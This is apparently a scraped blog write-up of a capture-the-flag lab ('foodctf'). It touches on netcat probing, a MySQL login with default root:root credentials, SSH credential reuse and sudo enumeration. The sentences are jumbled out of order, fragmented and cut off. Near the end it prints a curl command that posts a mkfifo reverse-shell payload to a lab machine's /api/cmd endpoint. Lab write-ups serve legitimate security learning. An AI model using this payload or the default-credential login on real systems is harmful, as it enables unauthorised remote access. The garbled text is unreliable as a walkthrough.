Warning: curl to output it to your terminal anyway, or consider "-output Warning: Binary output can mess up your terminal. Netcat is a great way to interact with services at a lower level, skippingīrowsers and clients. Let's try the one that's next up numerically, 16109. Now enumerating permissions randomly, we notice that we get asterisks when entering our password for Sorry, user ramen may not run sudo on foodctf. Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-91-generic sudo -l Now we have creds, let's try them for SSH. Knowing how to do this is quite useful MySQL > show databases Time to manually enumerate the databases and tables. ![]() Type '\c' to clear the current input statement. Server version: 5.7.29-0ubuntu0.18.04.1 (Ubuntu)Ĭopyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others. (root:root for old versions) will work for it. curl 10.10.149.17:15065/api/cmd -X POST -d 'rm /tmp/f mkfifo /tmp/f cat /tmp/f|/bin/bash -i 2>
0 Comments
Leave a Reply. |